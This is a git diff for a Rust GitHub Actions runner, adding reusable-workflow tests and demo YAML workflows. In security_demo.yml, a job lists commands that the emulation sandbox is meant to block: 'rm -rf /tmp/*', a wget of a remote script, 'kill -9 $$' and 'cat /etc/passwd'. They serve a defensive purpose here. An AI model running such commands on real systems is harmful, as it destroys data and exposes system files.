name: Called
on: workflow_dispatch
jobs:
inner:
runs-on: ubuntu-latest
steps:
- run: echo "hello from called"
"#;
write_file(&called_path, called);
// Caller workflow that uses the called workflow via absolute local path
let caller = format!(
r#"
name: Caller
on: workflow_dispatch
jobs:
call:
uses: {}
with:
foo: bar
secrets:
token: testsecret
"#,
called_path.display()
);
write_file(&caller_path, &caller);
// Execute caller workflow with emulation runtime
let cfg = ExecutionConfig {
runtime_type: RuntimeType::Emulation,
verbose: false,
preserve_containers_on_failure: false,
};
let result = execute_workflow(&caller_path, cfg)
.await
.expect("workflow execution failed");
// Expect a single caller job summarized
assert_eq!(result.jobs.len(), 1, "expected one caller job result");
let job = &result.jobs[0];
assert_eq!(job.name, "call");
assert_eq!(format!("{:?}", job.status), "Success");
// Summary step should include reference to called workflow and inner job status
assert!(job
.logs
.contains("Called workflow:"),
"expected summary logs to include called workflow path");
assert!(job.logs.contains("- inner: Success"), "expected inner job success in summary");
}
#[tokio::test]
async fn test_local_reusable_workflow_execution_failure_propagates() {
// Create temp workspace
let dir = tempdir().unwrap();
let called_path = dir.path().join("called.yml");
let caller_path = dir.path().join("caller.yml");
// Called workflow with failing job
let called = r#"
name: Called
on: workflow_dispatch
jobs:
inner:
runs-on: ubuntu-latest
steps:
- run: false
"#;
write_file(&called_path, called);
// Caller workflow
let caller = format!(
r#"
name: Caller
on: workflow_dispatch
jobs:
call:
uses: {}
"#,
called_path.display()
);
write_file(&caller_path, &caller);
// Execute caller workflow
let cfg = ExecutionConfig {
runtime_type: RuntimeType::Emulation,
verbose: false,
preserve_containers_on_failure: false,
};
let result = execute_workflow(&caller_path, cfg)
.await
.expect("workflow execution failed");
assert_eq!(result.jobs.len(), 1);
let job = &result.jobs[0];
assert_eq!(job.name, "call");
assert_eq!(format!("{:?}", job.status), "Failure");
assert!(job.logs.contains("- inner: Failure"));
}

35
tests/safe_workflow.yml Normal file
View File

@@ -0,0 +1,35 @@
name: Safe Workflow Test
on:
push:
workflow_dispatch:
jobs:
safe_operations:
name: Safe Operations
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: List files
run: ls -la
- name: Show current directory
run: pwd
- name: Echo message
run: echo "Hello, this is a safe command!"
- name: Create and read file
run: |
echo "test content" > safe-file.txt
cat safe-file.txt
rm safe-file.txt
- name: Show environment (safe)
run: echo "GITHUB_WORKSPACE=$GITHUB_WORKSPACE"
- name: Check if Rust is available
run: which rustc && rustc --version || echo "Rust not found"
continue-on-error: true

View File

@@ -59,7 +59,7 @@ fi
# Test 2: Check invalid runtime rejection
print_status "Test 2: Testing invalid runtime rejection..."
if ./target/release/wrkflw run --runtime invalid test-workflows/example.yml 2>&1 | grep -q "invalid value"; then
if ./target/release/wrkflw run --runtime invalid tests/workflows/example.yml 2>&1 | grep -q "invalid value"; then
print_success "Invalid runtime properly rejected"
else
print_error "Invalid runtime not properly rejected"

View File

@@ -0,0 +1,29 @@
name: Security Comparison Demo
on:
push:
workflow_dispatch:
jobs:
safe_operations:
name: Safe Operations (Works in Both Modes)
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: List files
run: ls -la
- name: Create and test file
run: |
echo "Hello World" > test.txt
cat test.txt
rm test.txt
echo "File operations completed safely"
- name: Environment check
run: |
echo "Current directory: $(pwd)"
echo "User: $(whoami)"
echo "Available commands: ls, echo, cat work fine"

92
tests/security_demo.yml Normal file
View File

@@ -0,0 +1,92 @@
name: Security Demo Workflow
on:
push:
workflow_dispatch:
jobs:
safe_commands:
name: Safe Commands (Will Pass)
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: List project files
run: ls -la
- name: Show current directory
run: pwd
- name: Echo a message
run: echo "This command is safe and will execute successfully"
- name: Check Rust version (if available)
run: rustc --version || echo "Rust not installed"
- name: Build documentation
run: echo "Building docs..." && mkdir -p target/doc
- name: Show environment
run: env | grep GITHUB
dangerous_commands:
name: Dangerous Commands (Will Be Blocked)
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
# These commands will be blocked in secure emulation mode
- name: Dangerous file deletion
run: rm -rf /tmp/* # This will be BLOCKED
continue-on-error: true
- name: System modification attempt
run: sudo apt-get update # This will be BLOCKED
continue-on-error: true
- name: Network download attempt
run: wget https://example.com/script.sh # This will be BLOCKED
continue-on-error: true
- name: Process manipulation
run: kill -9 $$ # This will be BLOCKED
continue-on-error: true
resource_intensive:
name: Resource Limits Test
runs-on: ubuntu-latest
steps:
- name: CPU intensive task
run: |
echo "Testing resource limits..."
# This might hit CPU or time limits
for i in {1..1000}; do
echo "Iteration $i"
sleep 0.1
done
continue-on-error: true
filesystem_test:
name: Filesystem Access Test
runs-on: ubuntu-latest
steps:
- name: Create files in allowed location
run: |
mkdir -p ./test-output
echo "test content" > ./test-output/safe-file.txt
cat ./test-output/safe-file.txt
- name: Attempt to access system files
run: cat /etc/passwd # This may be blocked
continue-on-error: true
- name: Show allowed file operations
run: |
echo "Safe file operations:"
touch ./temp-file.txt
echo "content" > ./temp-file.txt
cat ./temp-file.txt
rm ./temp-file.txt
echo "File operations completed safely"

Some files were not shown because too many files have changed in this diff Show More